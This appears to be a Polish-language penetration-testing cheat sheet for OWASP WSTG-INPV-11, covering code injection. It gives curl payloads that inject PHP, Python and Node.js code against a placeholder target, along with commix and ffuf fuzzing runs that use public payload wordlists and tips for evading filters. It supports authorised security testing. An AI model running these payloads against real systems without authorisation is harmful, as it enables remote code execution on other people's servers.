================================================================================
WSTG-INPV-11 — Testing for Code Injection
================================================================================
CELE:
- Identify injection points where you can inject code into the application
- Assess the injection severity

================================================================================
KOMENDY
================================================================================

# --- PHP code injection ---
curl -s "https://TARGET/page?input=phpinfo()"
curl -s "https://TARGET/page?input=system('id')"
curl -s "https://TARGET/page?input=${system('id')}"
curl -s "https://TARGET/page?input=';phpinfo();//"

# --- Python code injection ---
curl -s "https://TARGET/eval?expr=__import__('os').system('id')"
curl -s "https://TARGET/eval?expr=exec('import os;os.system(\"id\")')"

# --- Node.js code injection ---
curl -s "https://TARGET/eval?expr=require('child_process').execSync('id')"

# --- commix - automatyczny skaner ---
commix -u "https://TARGET/page?input=test" --batch

================================================================================
KOMENDY Z WORDLISTAMI
================================================================================

# --- fuzzdb OS command execution (code context) ---
ffuf -u "https://TARGET/page?input=FUZZ" -w /home/parallels/Desktop/WSTG/fuzzdb-master/attack/os-cmd-execution/command-execution-unix.txt -mc all -o output_ffuf_code_inj.json

# --- PayloadsAllTheThings Command Injection (powiazane) ---
ffuf -u "https://TARGET/page?input=FUZZ" -w "/home/parallels/Desktop/WSTG/PayloadsAllTheThings-master/Command Injection/Intruder/command_exec.txt" -mc all -o output_ffuf_cmd_exec.json

# --- SecLists command injection ---
ffuf -u "https://TARGET/page?input=FUZZ" -w /home/parallels/Desktop/WSTG/SecLists-master/Fuzzing/command-injection-commix.txt -mc all -o output_ffuf_commix.json

================================================================================
WERYFIKACJA MANUALNA (Burp Suite / Przegladarka / DevTools)
================================================================================
1. Zidentyfikuj parametry ktore moga byc ewaluowane (eval, exec, include)
2. Testuj wstrzykiwanie kodu specyficznego dla jezyka backendu
3. Sprawdz odpowiedzi pod katem wykonania kodu (output komendy id, phpinfo)
4. Testuj rozne enkodowania do obejscia filtrow
5. Uzyj Burp Intruder z listami payloadow
